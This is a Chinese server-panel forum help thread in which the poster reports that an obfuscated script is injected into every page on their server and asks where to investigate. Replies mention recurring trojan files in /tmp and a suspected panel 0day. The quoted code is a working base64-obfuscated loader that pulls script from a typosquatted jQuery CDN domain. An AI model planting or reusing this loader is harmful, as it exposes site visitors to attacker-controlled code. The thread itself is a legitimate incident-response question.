宝塔10周年开年大促,年度钜惠,先领红包再下单,享受折上折,还有抽奖!查看活动
当前位置:论坛首页 > Linux面板 > 求助

【已解答】服务器上所有网站都被插入木马代码,该检查...

发表在 Linux面板2026-1-26 15:00 [复制链接] 3 424

服务器上所有网站都被插入木马代码,检查网站文件均正常,但是访问网站每个页面都被插入跳转代码

  1. (function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9jZG4uc3RhdGljZmxsZS5jb20vanF1ZXJ5LzMuNy4xL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();
复制代码




这个是哪里可能有问题导致的?该检查哪里呢?
使用道具 举报 只看该作者 回复
发表于 2026-1-26 17:01:11 | 显示全部楼层
如需安全运维服务,可联系我司安全运维客户经理
ab.png
使用道具 举报 回复 支持 反对
发表于 2026-1-26 17:11:54 | 显示全部楼层
/var/tmp/ 和 /tmp 目录出现多个木马文件,反复删除,重装nginx始终无效。切换Apache目前未发现挂马。
使用道具 举报 回复 支持 反对
发表于 2026-1-29 01:15:17 | 显示全部楼层
您好,我现在遇到了相似的问题,前端页面被注入恶意代码,怀疑是宝塔0day,想问问您有找到攻击路径吗?如果方便的话,可以给我一个宝塔版本号便于分析总结吗
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表